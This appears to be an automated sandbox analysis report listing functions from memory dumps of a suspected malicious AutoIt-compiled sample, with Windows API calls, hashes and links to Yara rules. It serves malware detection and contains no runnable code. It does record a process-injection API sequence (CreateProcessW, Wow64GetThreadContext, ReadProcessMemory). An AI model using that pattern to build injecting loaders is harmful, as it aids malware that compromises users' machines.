Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 890695ca9c2f0c8f3a408969e385f79453576b751fbf6126ed0a6bc4f5b7a5c7
Instruction ID: 1bcbbf9841c95c1288eda59974fb5e57fcd01d1c9887153fc769b29991bf57fa
Opcode Fuzzy Hash: 890695ca9c2f0c8f3a408969e385f79453576b751fbf6126ed0a6bc4f5b7a5c7
Instruction Fuzzy Hash: 31E0863218061CB7D7211F54EC09FDA7B19AB06774F118220FB64790E0C7B11515A798

Function 00EF8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00EF8D1B

Part of subcall function 00EB2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00EB9A24), ref: 00EB2D69
Part of subcall function 00EB2D55: GetLastError.KERNEL32(00000000,?,00EB9A24), ref: 00EB2D7B

_free.LIBCMT ref: 00EF8D2C
_free.LIBCMT ref: 00EF8D3E

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 33c5d0e2fe74b214afc13ef001026ef0447084705f589f3bba1bca695a357c1c
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 7BE017A171160546CB24A6B8AA40AEB23EC4F98356B14291EB60DF7186CE64F8828128

Function 00E9A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00ECFC01

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: a409253dfd9697c252bfc849638da95fcf5eea1fee06b35f6866094c820f7a3e
Instruction ID: d4d6d75070c70554dabfc27a839bf8fbe20d564432f29855fa6a529ebba5a612
Opcode Fuzzy Hash: a409253dfd9697c252bfc849638da95fcf5eea1fee06b35f6866094c820f7a3e
Instruction Fuzzy Hash: C12236706083019FCB24DF14C594B6AB7E1FF85304F19A96DE89AAB362D731EC45DB82

Function 00E94C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E94CBA

Strings

EA06, xrefs: 00ECD8CC

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 74c5fad85e931aa91bcbac70d9af408fc502d6c605164b163ef81218a2f64db0
Instruction ID: 5b9ae4c8423043228aaa96df63c12595e3a3f44223230e79b5c09d9f25c5d655
Opcode Fuzzy Hash: 74c5fad85e931aa91bcbac70d9af408fc502d6c605164b163ef81218a2f64db0
Instruction Fuzzy Hash: F5419CE6A041585BDF269B548C51FFF7BE29B45304F287474EC82BB2C2D6219D4783A1

Function 00E97A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E97AAB
_memmove.LIBCMT ref: 00E97B16

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: c4f8b3316d91d07a06e822b250bbe724a3b073cde565ae2cd6c635469370c708
Instruction ID: e06e76bdd9b806425ca77676681cde21488bdc877f412b68343b1cd03d6a3bb1
Opcode Fuzzy Hash: c4f8b3316d91d07a06e822b250bbe724a3b073cde565ae2cd6c635469370c708
Instruction Fuzzy Hash: 5D31B3B1614606AFCB04DF68C8D1E6AB3A9FF483207149629E459DB291EB70F914CB90

Function 00E947D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00E94834

Part of subcall function 00EB336C: __lock.LIBCMT ref: 00EB3372
Part of subcall function 00EB336C: DecodePointer.KERNEL32(00000001,?,00E94849,00EE7C74), ref: 00EB337E
Part of subcall function 00EB336C: EncodePointer.KERNEL32(?,?,00E94849,00EE7C74), ref: 00EB3389

Part of subcall function 00E948FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E94915
Part of subcall function 00E948FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E9492A

Part of subcall function 00E93B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E93B68
Part of subcall function 00E93B3A: IsDebuggerPresent.KERNEL32 ref: 00E93B7A
Part of subcall function 00E93B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F552F8,00F552E0,?,?), ref: 00E93BEB
Part of subcall function 00E93B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00E93C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E94874

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 828dd908c66956c354b45b76e526e505cd3bc9437af4d15a2d1216628e4f4190
Instruction ID: fea8319fc23d16028e33108c68b3fa03cd0105bce28cfc8f0c7f39c719c04e3b
Opcode Fuzzy Hash: 828dd908c66956c354b45b76e526e505cd3bc9437af4d15a2d1216628e4f4190
Instruction Fuzzy Hash: AE11CD718183099BCB10DF38D80594ABBE8EF89750F10451EF154A32B2DB709549DB82

Function 00EB0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00EB571C: __FF_MSGBANNER.LIBCMT ref: 00EB5733
Part of subcall function 00EB571C: __NMSG_WRITE.LIBCMT ref: 00EB573A
Part of subcall function 00EB571C: RtlAllocateHeap.NTDLL(017F0000,00000000,00000001,00000000,?,?,?,00EB0DD3,?), ref: 00EB575F

std::exception::exception.LIBCMT ref: 00EB0DEC
__CxxThrowException@8.LIBCMT ref: 00EB0E01

Part of subcall function 00EB859B: RaiseException.KERNEL32(?,?,?,00F49E78,00000000,?,?,?,?,00EB0E06,?,00F49E78,?,00000001), ref: 00EB85F0

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 3a4171c1831e6a9da637783559ef560ff6cb35f162332050dd61d12338592d96
Instruction ID: 345a7c908286d5febfb22794508c42d6b002b76b763b1bd09ebf755143cb0c1f
Opcode Fuzzy Hash: 3a4171c1831e6a9da637783559ef560ff6cb35f162332050dd61d12338592d96
Instruction Fuzzy Hash: 5AF0A43150022D76CB20AAA4ED059DF7BEC9F01355F50146AFD14B6282DFB0EA80D2D1

Function 00EB53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00EB8B28: __getptd_noexit.LIBCMT ref: 00EB8B28

__lock_file.LIBCMT ref: 00EB53EB

Part of subcall function 00EB6C11: __lock.LIBCMT ref: 00EB6C34

__fclose_nolock.LIBCMT ref: 00EB53F6

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 7fea7b2678b85fbade9b81e5ced68ae97a48dcc7a239adf630ff70f2a148821b
Instruction ID: 6f6402f3f6543cff182839d22139127c5726fb5432a25bc74666184e37b97587
Opcode Fuzzy Hash: 7fea7b2678b85fbade9b81e5ced68ae97a48dcc7a239adf630ff70f2a148821b
Instruction Fuzzy Hash: FAF0BB32800A049ADB216F759D017EF7BE46F41374F24A115A424BB3C1CFFC89419F52

Function 01880045 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01880803
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01880899
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018808BB

Memory Dump Source

Source File: 00000000.00000002.1605418464.000000000187E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0187E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_187e000_J1VpshZJfm.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction ID: 79a72a0880590553423c2ef1503e6dce88433be8bca8340e8393d7ba1dcf5bec
Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction Fuzzy Hash: CC12DF24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F85CF5A

Function 00E9F290 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64379a398ce01182235e7c350cf47244b6154e0cde98ac967458ad5c31359ecc
Instruction ID: edfdf894ee4c9a2c4e87aa7da34b3a165264769d285de0859269e59262371dbd
Opcode Fuzzy Hash: 64379a398ce01182235e7c350cf47244b6154e0cde98ac967458ad5c31359ecc
Instruction Fuzzy Hash: 836169B060020A9FCF24DF64C881AABB7E5EF44314F24947EE916E7292D775ED41CB50

Function 00EB0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00EB0CB7

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 563a6d9ba965576e38112fffca23cd7149e4b4382703a61c045505c917f080e1
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 3E31C370A001059BC718DF58D4849ABFBA6FB59314B64A6A5E80AEB361DB31FDC1DFC0

Function 00ECFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00ECFCB7

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 9705f4e97d468685a719665b48ab4610df9903878e09fdba6894983bd8b41397
Instruction ID: d3c91a6c0e1081812071ee2add0c53a4d81e520211f00183f87604f9a37deda0
Opcode Fuzzy Hash: 9705f4e97d468685a719665b48ab4610df9903878e09fdba6894983bd8b41397
Instruction Fuzzy Hash: E941F974504341DFDB14DF18C444B5ABBE1BF85318F0999ACE89AAB762C732E845CF92

Function 00E97B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E97BB3

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 0aac1f7bd4bb8511657fd66ed5bddc68a8dd153768c0259b22f6eae5aaaf4810
Instruction ID: 3ede51927427f747a62cc586ec8799d92dd494c073a433a3f91f8c238a5239f2
Opcode Fuzzy Hash: 0aac1f7bd4bb8511657fd66ed5bddc68a8dd153768c0259b22f6eae5aaaf4810
Instruction Fuzzy Hash: 5E217872614A09EBCF148F15E941FAEBBB4FF24350F20842DE886E52A0EB31D0D1D701

Function 00E94DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E94BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00E94BEF

Part of subcall function 00EB525B: __wfsopen.LIBCMT ref: 00EB5266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E94E0F

Part of subcall function 00E94B6A: FreeLibrary.KERNEL32(00000000), ref: 00E94BA4

Part of subcall function 00E94C70: _memmove.LIBCMT ref: 00E94CBA

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 1bfb3efc3cfdd01ec7a3e8be22d261bb064500f060051a98b913b75da14cb8ab
Instruction ID: 094b62f450672e05700e3d57e90c4849abda66e4072f9620fb137eda420162d2
Opcode Fuzzy Hash: 1bfb3efc3cfdd01ec7a3e8be22d261bb064500f060051a98b913b75da14cb8ab
Instruction Fuzzy Hash: 7C11E37260020AABCF15EF70CC12FAE77E8AF84710F10982DF541BB1C1EA719A069B51

Function 00ECFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00ECFD91

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: f9cb07aa8605a4fb7576de4ae29d9ff42726b8d049b542f34b311c071da6ce0b
Instruction ID: fcd6b3ce740a6eff6394f517b641d11dc57187e431c8a121a9aa4bb21e9cc829
Opcode Fuzzy Hash: f9cb07aa8605a4fb7576de4ae29d9ff42726b8d049b542f34b311c071da6ce0b
Instruction Fuzzy Hash: 2F21F574608341DFCB14DF64C444B5ABBE1BF88318F09996CF88A6B722D731E805CB92

Function 00EB4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00EB48A6

Part of subcall function 00EB8B28: __getptd_noexit.LIBCMT ref: 00EB8B28

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 704284fee2c66ebd76d53f661cbdfcde71d4227a7e1d7f4031ea0acbf823033b
Instruction ID: a580a8819da5e7d9400ca7c6e7b9d7a88addf34d6d1c1827201bd012576ecd23
Opcode Fuzzy Hash: 704284fee2c66ebd76d53f661cbdfcde71d4227a7e1d7f4031ea0acbf823033b
Instruction Fuzzy Hash: 11F0AFB1900649ABDF15AFB48C067EF3AE5AF00325F15A414B824BA2D2CBB8C951DF51

Function 00E94E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00F552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E94E7E

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 9277426a8409a5c3be4b863e965d8becc10660a457ff3a69be7194a2dd2c312c
Instruction ID: ed1acfe903e7a25ff3bcd3e5d9901d91630f983ea282dc80ebbd0f72bbb68bf8
Opcode Fuzzy Hash: 9277426a8409a5c3be4b863e965d8becc10660a457ff3a69be7194a2dd2c312c
Instruction Fuzzy Hash: 0CF039B1501711CFCF349F64E894C56BBE1BF14329320AA3EE1D7AA660C7329885EF40

Function 00EB0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EB07B0

Part of subcall function 00E97BCC: _memmove.LIBCMT ref: 00E97C06

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 7605dff43b1538d5f2375daae02e19de85003b8197b52c52e3bbce6981796a08
Instruction ID: c6a1d4a236a3d0ba657c46c5ed0c8795c2f6ae0689b3fc3717eaf2e87c7a851e
Opcode Fuzzy Hash: 7605dff43b1538d5f2375daae02e19de85003b8197b52c52e3bbce6981796a08
Instruction Fuzzy Hash: A1E0863690422857C72096589C05FEA77DDDB897A0F0541B5FC08D7205D9719C848690

Function 00EB525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00EB5266

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: e28242588b8261c465760c3617b527a72cdb549c4622b8b2b1c8edac25b0879c
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 66B0927644020C77CE022A82EC02B8A3B699B41764F408020FB0C28172A673AA649A89

Function 01881044 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01881059

Memory Dump Source

Source File: 00000000.00000002.1605418464.000000000187E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0187E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_187e000_J1VpshZJfm.jbxd

Similarity

API ID: Sleep
